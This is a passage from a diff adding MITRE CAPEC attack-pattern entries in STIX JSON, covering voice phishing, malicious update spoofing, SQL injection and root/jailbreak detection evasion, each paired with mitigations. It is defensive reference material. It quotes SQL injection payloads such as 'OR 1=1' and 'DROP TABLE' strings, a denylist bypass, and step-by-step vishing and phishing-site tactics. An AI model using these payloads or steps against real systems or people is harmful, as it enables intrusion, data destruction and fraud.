"spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--31b90554-68d8-4950-ac45-89c915a30716" + ], + "x_capec_consequences": { + "Accountability": [ + "Hide Activities", + "Bypass 
Protection Mechanism" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Adding data to change the checksum of a file and can be used to avoid hash-based denylists and static anti-virus signatures.\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary targets users with a phishing attack for the purpose of soliciting account passwords or sensitive information from the user. Voice Phishing is a variation of the Phishing social engineering technique where the attack is initiated via a voice call, rather than email. The user is enticed to provide sensitive information by the adversary, who masquerades as a legitimate employee of the alleged organization. Voice Phishing attacks deviate from standard Phishing attacks, in that a user doesn't typically interact with a compromised website to provide sensitive information and instead provides this information verbally. Voice Phishing attacks can also be initiated by either the adversary in the form of a \"cold call\" or by the victim if calling an illegitimate telephone number.", + "external_references": [ + { + "external_id": "CAPEC-656", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/656.html" + }, + { + "description": "Jovi Umawing, Something else is phishy: How to detect phishing attempts on mobile phones , 2018--12---10, Malwarebytes", + "external_id": "REF-592", + "source_name": "reference_from_CAPEC", + "url": "https://blog.malwarebytes.com/101/2018/12/something-else-phishy-detect-phishing-attempts-mobile/" + }, + { + "description": "Jennifer van der Kleut, What is vishing? 
Tips for spotting and avoiding voice scams, NortonLifeLock Inc.", + "external_id": "REF-594", + "source_name": "reference_from_CAPEC", + "url": "https://ieeexplore.ieee.org/document/6604058/authors#authors" + }, + { + "description": "What Is Vishing?, AO Kaspersky Lab", + "external_id": "REF-595", + "source_name": "reference_from_CAPEC", + "url": "https://www.kaspersky.com/resource-center/definitions/vishing" + } + ], + "id": "attack-pattern--ec0a802f-1d0a-4360-a4d8-3fb9f48715d0", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Voice Phishing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_alternate_terms": [ + "Vishing", + "VoIP Phishing" + ], + "x_capec_child_of_refs": [ + "attack-pattern--a00c2cc2-bd4f-4594-9ec1-b021b62ac896" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_example_instances": [ + "The target receives an email or text message stating that their Apple ID has been disabled due to suspicious activity and that the included link includes instructions on how to unlock their Apple account. The link in the text message looks legitimate and once the link is clicked, the user is redirected to a legitimate-looking webpage that prompts the user to call a specified number to initiate the unlock process. The target initiates the phone call and provides their credentials or other sensitive information to the individual they assume works for Apple. Now that the adversary possess this data, it can be used to log into the account to obtain other sensitive data, such as Apple Pay information.", + "An adversary calls the target and claims to work for their bank. 
The adversary informs the target that their bank account has been frozen, due to potential fraudulent spending, and requires authentication in order to re-enable the account. The target, believing the caller is a legitimate bank employee, provides their bank account login credentials to confirm they are the authorized owner of the account. The adversary then confirms this authentication and claims that the account has been unlocked. Once the adversary has obtained these credentials, money can be transferred from the victim's account to an account controlled by the adversary." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Obtain domain name and certificate to spoof legitimate site: This optional step can be used to help the adversary impersonate the legitimate organization more convincingly. The adversary can use homograph or similar attacks to convince users that they are using the legitimate website. If the adversary leverages cold-calling for this attack, this step is skipped.

  2. Techniques
    Optionally obtain a domain name that visually looks similar to the legitimate organization's domain name. An example is www.paypaI.com vs. www.paypal.com (the first one contains a capital i, instead of a lower case L)
    Optionally obtain a legitimate SSL certificate for the new domain name.
  3. Explore legitimate website and create duplicate: An adversary optionally creates a website (optionally at a URL that looks similar to the original URL) that closely resembles the organization's website that they are trying to impersonate. That website will contain a telephone number for the victim to call to assist them with their issue and initiate the attack. If the adversary leverages cold-calling for this attack, this step is skipped.

  4. Techniques
    Use spidering software to get copy of web pages on legitimate site.
    Manually save copies of required web pages from legitimate site.
    Create new web pages that have the legitimate site's look and feel, but contain completely new content.

Exploit

  1. Convince user to provide sensitive information to the adversary.: An adversary \"cold calls\" the victim or receives a call from the victim via the malicious site and provides a call-to-action, in order to persuade the user into providing sensitive details to the adversary (e.g. login credentials, bank account information, etc.). The key is to get the victim to believe that the individual they are talking to is from a legitimate entity with which the victim does business and that the call is occurring for legitimate reasons. A call-to-action will usually need to sound legitimate and urgent enough to prompt action from the user.

  2. Techniques
    Call the user a from a spoofed legitimate-looking telephone number.
  3. Use stolen information: Once the adversary obtains the sensitive information, this information can be leveraged to log into the victim's bank account and transfer money to an account of their choice, or to make fraudulent purchases with stolen credit card information.

  4. Techniques
    Login to the legitimate site using another the victim's supplied credentials
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "An adversary needs phone numbers to initiate contact with the victim, in addition to a legitimate-looking telephone number to call the victim from.", + "An adversary needs to correctly guess the entity with which the victim does business and impersonate it. Most of the time phishers just use the most popular banks/services and send out their \"hooks\" to many potential victims.", + "An adversary needs to have a sufficiently compelling call to action to prompt the user to take action.", + "If passively conducting this attack via a spoofed website, replicated website needs to look extremely similar to the original website and the URL used to get to that website needs to look like the real URL of the said business entity." + ], + "x_capec_resources_required": [ + "Legitimate-looking telephone number(s) to initiate calls with victims" + ], + "x_capec_skills_required": { + "Medium": "Basic knowledge about websites: obtaining them, designing and implementing them, etc." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not accept calls from unknown numbers or from numbers that may be flagged as spam. Also, do not call numbers that appear on-screen after being unexpectedly redirected to potentially malicious websites. In either case, do not provide sensitive information over voice calls that are not legitimately initiated. 
Instead, call your Bank, PayPal, eBay, etc., via the number on their public-facing website and inquire about the problem.", + "id": "course-of-action--6e3af87a-42f6-4c03-85e4-aaa333a97b18", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-656-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--244a5166-f226-4066-b561-6df35600a91c", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6e3af87a-42f6-4c03-85e4-aaa333a97b18", + "spec_version": "2.1", + "target_ref": "attack-pattern--ec0a802f-1d0a-4360-a4d8-3fb9f48715d0", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attackers uses identify or content spoofing to trick a client into performing an automated software update from a malicious source. A malicious automated software update that leverages spoofing can include content or identity spoofing as well as protocol spoofing. Content or identity spoofing attacks can trigger updates in software by embedding scripted mechanisms within a malicious web page, which masquerades as a legitimate update source. Scripting mechanisms communicate with software components and trigger updates from locations specified by the attackers' server. 
The result is the client believing there is a legitimate software update available but instead downloading a malicious update from the attacker.", + "external_references": [ + { + "external_id": "CAPEC-657", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/657.html" + }, + { + "external_id": "CWE-494", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/494.html" + }, + { + "description": "Software Deployment Tools", + "external_id": "T1072", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1072" + } + ], + "id": "attack-pattern--9b9760ba-c8de-42c7-9de0-3a5ee2d2abdb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Malicious Automated Software Update via Spoofing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--862d18f1-a87c-4f1b-acc2-882697d5d6e5" + ], + "x_capec_child_of_refs": [ + "attack-pattern--3c9e7b88-a1eb-4cfd-aa34-10df08b23317" + ], + "x_capec_consequences": { + "Access_Control": [ + "Execute Unauthorized Commands" + ], + "Availability": [ + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Software" + ], + "x_capec_example_instances": [ + "An example of the spoofing strategy would be the eTrust Antivirus Webscan Automated Update Remote Code Execution vulnerability (CVE-2006-3976) and (CVE-2006-3977) whereby an ActiveX control could be remotely manipulated by an attacker controlled web page to download and execute the attackers' code without integrity checking." 
+ ], + "x_capec_likelihood_of_attack": "High", + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack exploits target software that constructs SQL statements based on user input. An attacker crafts input strings so that when the target software constructs SQL statements based on the input, the resulting SQL statement performs actions other than those the application intended. SQL Injection results from failure of the application to appropriately validate input.", + "external_references": [ + { + "external_id": "CAPEC-66", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/66.html" + }, + { + "external_id": "CWE-89", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/89.html" + }, + { + "external_id": "CWE-1286", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1286.html" + }, + { + "description": "SQL Injection", + "external_id": "19", + "source_name": "WASC", + "url": "http://projects.webappsec.org/SQL-Injection" + }, + { + "description": "SQL Injection", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/SQL_Injection" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-607", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection.html" + } + ], + "id": "attack-pattern--42acc604-a86c-46f7-bd03-6e532c02d85e", + "modified": "2022-02-22T00:00:00.000Z", + "name": "SQL Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": 
"Standard", + "x_capec_child_of_refs": [ + "attack-pattern--2fb2b2b8-b7de-45a2-aadb-5849d12fda8f" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "With PHP-Nuke versions 7.9 and earlier, an attacker can successfully access and modify data, including sensitive contents such as usernames and password hashes, and compromise the application through SQL Injection. The protection mechanism against SQL Injection employs a denylist approach to input validation. However, because of an improper denylist, it is possible to inject content such as \"foo'/**/UNION\" or \"foo UNION/**/\" to bypass validation and glean sensitive information from the database. See also: CVE-2006-5525" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey application: The attacker first takes an inventory of the functionality exposed by the application.

  2. Techniques
    Spider web sites for all available links
    Sniff network communications with application using a utility such as WireShark.

Experiment

  1. Determine user-controllable input susceptible to injection: Determine the user-controllable input susceptible to injection. For each user-controllable input that the attacker suspects is vulnerable to SQL injection, attempt to inject characters that have special meaning in SQL (such as a single quote character, a double quote character, two hyphens, a parenthesis, etc.). The goal is to create a SQL query with an invalid syntax.

  2. Techniques
    Use web browser to inject input through text fields or through HTTP GET parameters.
    Use a web application debugging tool such as Tamper Data, TamperIE, WebScarab,etc. to modify HTTP POST parameters, hidden fields, non-freeform fields, etc.
    Use network-level packet injection tools such as netcat to inject input
    Use modified client (modified by reverse engineering) to inject input.
  3. Experiment with SQL Injection vulnerabilities: After determining that a given input is vulnerable to SQL Injection, hypothesize what the underlying query looks like. Iteratively try to add logic to the query to extract information from the database, or to modify or delete information in the database.

  4. Techniques
    Use public resources such as \"SQL Injection Cheat Sheet\" at http://ferruh.mavituna.com/makale/sql-injection-cheatsheet/, and try different approaches for adding logic to SQL queries.
    Add logic to query, and use detailed error messages from the server to debug the query. For example, if adding a single quote to a query causes an error message, try : \"' OR 1=1; --\", or something else that would syntactically complete a hypothesized query. Iteratively refine the query.
    Use \"Blind SQL Injection\" techniques to extract information about the database schema.
    If a denial of service attack is the goal, try stacking queries. This does not work on all platforms (most notably, it does not work on Oracle or MySQL). Examples of inputs to try include: \"'; DROP TABLE SYSOBJECTS; --\" and \"'); DROP TABLE SYSOBJECTS; --\". These particular queries will likely not work because the SYSOBJECTS table is generally protected.

Exploit

  1. Exploit SQL Injection vulnerability: After refining and adding various logic to SQL queries, craft and execute the underlying SQL query that will be used to attack the target system. The goal is to reveal, modify, and/or delete database data, using the knowledge obtained in the previous step. This could entail crafting and executing multiple SQL queries if a denial of service attack is the intent.

  2. Techniques
    Craft and Execute underlying SQL query
", + "x_capec_extended_description": "\n When specially crafted user-controlled input consisting of SQL syntax is used without proper validation as part of SQL queries, it is possible to glean information from the database in ways not envisaged during application design. Depending upon the database and the design of the application, it may also be possible to leverage injection to have the database execute system-related commands of the attackers' choice. SQL Injection enables an attacker to interact directly to the database, thus bypassing the application completely. Successful injection can cause information disclosure as well as ability to add or modify data in the database.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--89acf77d-723b-43b4-b66d-6eaafed52369", + "attack-pattern--f0e32d0e-9580-4b79-95e0-6e3b99bf6e45", + "attack-pattern--7c90bef7-530c-427b-8fb7-f9d3eda9c26a", + "attack-pattern--35bde6ec-0a19-462c-92b4-9c481dc4986e", + "attack-pattern--9116da7f-a60e-4186-b42a-218f1b0eb269" + ], + "x_capec_prerequisites": [ + "SQL queries used by the application to store, retrieve or modify data.", + "User-controllable input that is not properly validated by the application as part of SQL queries." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "It is fairly simple for someone with basic SQL knowledge to perform SQL injection, in general. In certain instances, however, specific knowledge of the database employed may be required." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Strong input validation - All user-controllable input must be validated and filtered for illegal characters as well as SQL content. 
Keywords such as UNION, SELECT or INSERT must be filtered in addition to characters such as a single-quote(') or SQL-comments (--) based on the context in which they appear.", + "id": "course-of-action--07cbed26-8c96-41e6-a239-7be587a38673", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-66-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a93f8f1b-9607-4383-9b6f-7be3de09fc48", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--07cbed26-8c96-41e6-a239-7be587a38673", + "spec_version": "2.1", + "target_ref": "attack-pattern--42acc604-a86c-46f7-bd03-6e532c02d85e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use of parameterized queries or stored procedures - Parameterization causes the input to be restricted to certain domains, such as strings or integers, and any input outside such domains is considered invalid and the query fails. 
Note that SQL Injection is possible even in the presence of stored procedures if the eventual query is constructed dynamically.", + "id": "course-of-action--3b3ecd49-a48b-4908-b854-071ac6b15f1c", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-66-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5fc50ca5-d17c-4f39-96d4-795ef6ac0bb1", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3b3ecd49-a48b-4908-b854-071ac6b15f1c", + "spec_version": "2.1", + "target_ref": "attack-pattern--42acc604-a86c-46f7-bd03-6e532c02d85e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--df5e28f8-bb74-4412-960d-bef6cec27c9f", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--618c2d85-ca76-40a0-a019-0ac9ba1b0989", + "spec_version": "2.1", + "target_ref": "attack-pattern--42acc604-a86c-46f7-bd03-6e532c02d85e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary forces a non-restricted mobile application to load arbitrary code or code files, via Hooking, with the goal of evading Root/Jailbreak detection. 
Mobile device users often Root/Jailbreak their devices in order to gain administrative control over the mobile operating system and/or to install third-party mobile applications that are not provided by authorized application stores (e.g. Google Play Store and Apple App Store). Adversaries may further leverage these capabilities to escalate privileges or bypass access control on legitimate applications. Although many mobile applications check if a mobile device is Rooted/Jailbroken prior to authorized use of the application, adversaries may be able to \"hook\" code in order to circumvent these checks. Successfully evading Root/Jailbreak detection allows an adversary to execute administrative commands, obtain confidential data, impersonate legitimate users of the application, and more.", + "external_references": [ + { + "external_id": "CAPEC-660", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/660.html" + }, + { + "external_id": "CWE-829", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/829.html" + }, + { + "description": "Process Injection", + "external_id": "T1055", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1055" + }, + { + "description": "Ansgar Kellner, Micha Horlboge, Konrad Rieck, Christian Wressnegger, False Sense of Security: A Study on the Effectivity of Jailbreak Detection in Banking Apps, 2019--06---17, Technische Universität Braunschweig", + "external_id": "REF-624", + "source_name": "reference_from_CAPEC", + "url": "https://cybersecurity.att.com/blogs/security-essentials/mobile-phishing" + }, + { + "description": "San-Tsai Sun, Andrea Cuadros, Konstantin Beznosov, Android Rooting: Methods, Detection, and Evasion, 2019--06---17, Technische Universität Braunschweig", + "external_id": "REF-625", + "source_name": "reference_from_CAPEC", + "url": "http://lersse-dl.ece.ubc.ca/record/310/files/p3.pdf?subformat=pdfa" + }, + { + "description": "Jose Lopes, Who owns your 
runtime?, 2015--10---12, Nettitude Labs", + "external_id": "REF-626", + "source_name": "reference_from_CAPEC", + "url": "https://labs.nettitude.com/blog/ios-and-android-runtime-and-anti-debugging-protections/#hooking" + }, + { + "description": "Suresh Khutale, Android Root Detection Bypass by Reverse Engineering APK, 2018--03---06, InfoSec Institute", + "external_id": "REF-627", + "source_name": "reference_from_CAPEC", + "url": "https://resources.infosecinstitute.com/topic/android-root-detection-bypass-reverse-engineering-apk/" + } + ], + "id": "attack-pattern--fa4feb09-657b-40a0-9edd-6187b55047e3", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Root/Jailbreak Detection Evasion via Hooking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--80649f3c-d2f3-4703-9e78-e096673a7517" + ], + "x_capec_child_of_refs": [ + "attack-pattern--283d665d-e109-4d5d-8993-6fb25e5923d6" + ], + "x_capec_consequences": { + "Access_Control": [ + "Read Data (An adversary may leverage Root/Jailbreak Detection Evasion via Hooking in order to obtain sensitive information.)" + ], + "Authorization": [ + "Execute Unauthorized Commands (Through Root/Jailbreak Detection Evasion via Hooking, the adversary compromises the integrity of the application.)", + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data (An adversary may leverage Root/Jailbreak Detection Evasion via Hooking in order to obtain sensitive information.)" + ], + "Integrity": [ + "Execute Unauthorized Commands (Through Root/Jailbreak Detection Evasion via Hooking, the adversary compromises the integrity of the application.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "An adversary targets a non-restricted iOS banking application in an attempt to compromise sensitive user data. 
The adversary creates Objective-C runtime code that always returns \"false\" when checking for the existence of the Cydia application. The malicious code is then dynamically loaded into the application via the DYLD_INSERT_LIBRARIES environment variable. When the banking applications checks for Cydia, the hooked code returns \"false\", so the application assumes the device is stock (i.e. not Jailbroken) and allows it to access the application. However, the adversary has just evaded Jailbreak detection and is now able to glean user credentials and/or transaction details.", + "An adversary targets a mobile voting application on an Android device with the goal of committing voter fraud. Leveraging the Xposed framework, the adversary is able to create and hook Java code into the application that bypasses Root detection methods. When the voting application attempts to detect a Rooted device by checking for commonly known installed packages associated with Rooting, the hooked code removes the suspicious packages before returning to the application. As a result, the application believes the device is stock (i.e. not Rooted) when in actuality this is not the case. Having evading Root detection, the adversary is now able to cast votes for the candidate of their choosing as a variety of different users." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify application with attack potential: The adversary searches for and identifies a mobile application that could be exploited for malicious purposes (e.g. banking, voting, or medical applications).

  2. Techniques
    Search application stores for mobile applications worth exploiting

Experiment

  1. Develop code to be hooked into chosen target application: The adversary develops code or leverages existing code that will be hooked into the target application in order to evade Root/Jailbreak detection methods.

  2. Techniques
    Develop code or leverage existing code to bypass Root/Jailbreak detection methods.
    Test the code to see if it works.
    Iteratively develop the code until Root/Jailbreak detection methods are evaded.

Exploit

  1. Execute code hooking to evade Root/Jailbreak detection methods: Once hooking code has been developed or obtained, execute the code against the target application to evade Root/Jailbreak detection methods.

  2. Techniques
    Hook code into the target application.
", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The targeted application must be non-restricted to allow code hooking." + ], + "x_capec_resources_required": [ + "The adversary must have a Rooted/Jailbroken mobile device.", + "The adversary needs to have enough access to the target application to control the included code or file." + ], + "x_capec_skills_required": { + "High": "Knowledge about Root/Jailbreak detection and evasion techniques.", + "Medium": "Knowledge about code hooking." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure mobile applications are signed appropriately to avoid code inclusion via hooking.", + "id": "course-of-action--a26576b7-5508-45c7-b841-988783c129d3", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-660-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3ed05e0f-72dd-495e-af10-e186067c014b", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a26576b7-5508-45c7-b841-988783c129d3", + "spec_version": "2.1", + "target_ref": "attack-pattern--fa4feb09-657b-40a0-9edd-6187b55047e3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Inspect the application's memory for suspicious artifacts, such as shared objects/JARs or dylibs, after other 
Root/Jailbreak detection methods.", + "id": "course-of-action--ab5ae276-92d5-4d92-8409-8a4400de6800", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-660-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--66be5c7d-d8d0-490b-93f7-33a6b9a2ee47", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ab5ae276-92d5-4d92-8409-8a4400de6800", + "spec_version": "2.1", + "target_ref": "attack-pattern--fa4feb09-657b-40a0-9edd-6187b55047e3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Inspect the application's stack trace for suspicious method calls.", + "id": "course-of-action--43850af6-9f1d-4bb9-a858-9d516bf243f7", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-660-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--625a5ed4-6a77-4589-80db-7eb242928389", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--43850af6-9f1d-4bb9-a858-9d516bf243f7", + "spec_version": "2.1", + "target_ref": "attack-pattern--fa4feb09-657b-40a0-9edd-6187b55047e3", + "type": "relationship", + 
"x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Allow legitimate native methods, and check for non-allowed native methods during Root/Jailbreak detection methods.", + "id": "course-of-action--d8677776-34d9-4dae-add9-a6e12cfc342e", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-660-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6aaf6432-9f26-4d24-9622-96e8a784c382", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d8677776-34d9-4dae-add9-a6e12cfc342e", + "spec_version": "2.1", + "target_ref": "attack-pattern--fa4feb09-657b-40a0-9edd-6187b55047e3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "For iOS applications, ensure application methods do not originate from outside of Apple's SDK.", + "id": "course-of-action--70e9b054-c49a-4250-8674-4d37b0ae027a", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-660-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ad5e1d79-01e2-4822-81ba-6cd81c7049e7", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + 
